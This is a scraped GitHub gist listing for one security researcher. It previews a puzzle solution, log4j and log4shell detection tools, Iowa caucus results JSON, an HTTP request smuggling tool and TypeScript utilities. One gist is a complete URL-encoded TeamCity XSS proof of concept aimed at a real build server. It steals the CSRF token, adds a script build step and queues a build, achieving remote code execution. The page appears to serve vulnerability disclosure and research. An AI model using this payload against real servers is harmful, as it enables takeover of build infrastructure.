Skip to content

Instantly share code, notes, and snippets.

View karanlyons's full-sized avatar

Karan Lyons karanlyons

66 followers · 10 following
View GitHub Profile
@karanlyons
karanlyons / bringing-a-gun-to-a-trainer-fight.py
Created April 5, 2024 20:50
Foobar Solutions
#!/usr/bin/env python3
from collections import namedtuple
from fractions import gcd
from math import ceil, sqrt
# Calculating distances with bounces and stuff is...a pain, but given our bounce rules we
# can instead construct infinite congruent rooms, mirrored about each other, which in
# effect "unwraps" the bouncing line into just a straight one. In ascii form:
@karanlyons
karanlyons / README.md
Last active December 4, 2023 23:07
Find Running Processes Referencing log4j

When run on a box, outputs a single row of JSON for every proc on the box that loads a jar/war that contains any files with 'log4j' in them, including precisely what triggered the match. For example (pretty printed here for clarity; note that this one is happily a false positive):

{
  "node": "HW0000001",
  "time": 1632617610.3860812,
  "pid": 78676,
  "cmd": "/usr/local/opt/openjdk/libexec/openjdk.jdk/Contents/Home/bin/java",
  "args": [
    "-Xms128M",
@karanlyons
karanlyons / log4shell_regexes.py
Last active March 7, 2022 03:49
log4shell Regexes
import re
from urllib.parse import unquote
FLAGS = re.IGNORECASE | re.DOTALL
ESC_DOLLAR = r'(?:\$|[\\%]u0024||\\x24|\\0?44|%24)'
ESC_LCURLY = r'(?:\{|[\\%]u007B|\\x7B|\\173|%7B)'
ESC_RCURLY = r'(?:\}|[\\%]u007D|\\x7D|\\175|%7D)'
_U_PERCENT_ESCAPE_RE = re.compile(r'%(u[0-9a-f]{4})', flags=FLAGS)
_PERCENT_ESCAPE_RE = re.compile(r'%[0-9a-f]{2}', flags=FLAGS)
@karanlyons
karanlyons / example.md
Last active May 1, 2020 08:15
pngen: Makes ECB PNGuins

Plaintext:

Plaintext Penguin

Duplicate Plaintext Blocks:
	Total Blocks:                         358414
	Total Duplicates:                     349474
@karanlyons
karanlyons / IA.json
Created February 6, 2020 03:45
Iowa Caucus 2020 JSON Results
This file has been truncated, but you can view the full file.
{"Adair":{"4SE ORIENT":{"Bennet":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Biden":{"First Expression":7.0,"Final Expression":7.0,"SDE":0.1569},"Bloomberg":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Buttigieg":{"First Expression":6.0,"Final Expression":6.0,"SDE":0.1569},"Delaney":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Gabbard":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Klobuchar":{"First Expression":6.0,"Final Expression":6.0,"SDE":0.1569},"Patrick":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Sanders":{"First Expression":6.0,"Final Expression":6.0,"SDE":0.0784},"Steyer":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Warren":{"First Expression":9.0,"Final Expression":9.0,"SDE":0.2353},"Yang":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Other":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Uncommitted":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0}},"1NW ADAIR":{"Bennet":{"First Ex
@karanlyons
karanlyons / smuggler.py
Last active February 17, 2021 17:58
Burp Suite is for chumps.
#!/bin/env python3
import dataclasses
import re
import socket
import ssl as _ssl
import types
from collections import namedtuple, OrderedDict
from dataclasses import dataclass
from io import StringIO
from itertools import chain
@karanlyons
karanlyons / lazyString.ts
Last active August 7, 2019 06:50
Procrastinate till you evaluate.
export type StringReturningFunction = (...args: any[]) => string;
interface LazyString extends String {}
interface LazyStringConstructor {
new <F extends StringReturningFunction>(
func: F,
...args: Parameters<F>
): LazyString;
<F extends StringReturningFunction>(func: F, ...args: Parameters<F>): string;
@karanlyons
karanlyons / format.ts
Last active August 6, 2019 12:08
Add translator friendly markup to translatable strings.
export type Formatters = { [k: string]: (s: string) => string };
export class FormatError extends Error {
constructor(
public message: string,
public str: string,
public formatters: Formatters,
public tag: string
) {
super();
@karanlyons
karanlyons / teamcity-poc-link.text
Last active December 19, 2019 21:33
TeamCity XSS RCE PoC
https://builds.gradle.org/project.html?projectId=GradleProfiler&tab=problems%27%7D)%3B%7D)()%3B((w%2Cd%2Ch%2Cx%2Cn)%3D%3E%7Bw.p%7C%7C(w.p%3D1%2Cw.onerror%3D()%3D%3E1%2Cw.addEventListener(%22DOMContentLoaded%22%2C()%3D%3E%7Bw.history.replaceState(0%2Cd.title%2Ch.slice(0%2Ch.indexOf(%22%2527%22)))%3Bvar%20t%3Dd.querySelector(%22.tc-csrf-token-input%22).value%2Ce%3Dx(%60%2Fadmin%2FeditRunType.html%3Fid%3DbuildType%253A%24%7Bn%7D%26runnerId%3D__NEW_RUNNER__%26submitBuildType%3Dstore%60)%3Be.onloadend%3D()%3D%3E%7Bvar%20a%3Dx(%22%2Fajax.html%22)%3Ba.setRequestHeader(%22X-TC-CSRF-Token%22%2Ct)%3Ba.send(%60add2Queue%3D%24%7Bn%7D%26validate%3Dtrue%26redirectTo%60)%3B%7D%3Be.send(%60runTypeInfoKey%3DsimpleRunner%26buildStepName%3DRCE%2BDemo%26prop%253Ateamcity.step.mode%3Ddefault%26prop%253Ause.custom.script%3Dtrue%26prop%253Ascript.content%3Decho%2B%2522RCE%2Bvia%2BXSS%2522%26submitButton%3DSave%26tc-csrf-token%3D%24%7Bt%7D%60)%7D))%7D)(window%2Cdocument%2Clocation.href%2Cp%3D%3E%7Bvar%20x%3Dnew%20XMLHttpRequest()%3B
@karanlyons
karanlyons / payloadPack.js
Last active July 26, 2019 20:52
Char wise, byte foolish.
const pack = s =>
s.match(/^[\u0000-\u00ff]*$/)
? s
.split("")
.map(s => s.charCodeAt())
.reduce(
(pairs, c) =>
(
!c || pairs[pairs.length - 1].length === 2
? pairs.push(...(c? [[c]] : [[c], []]))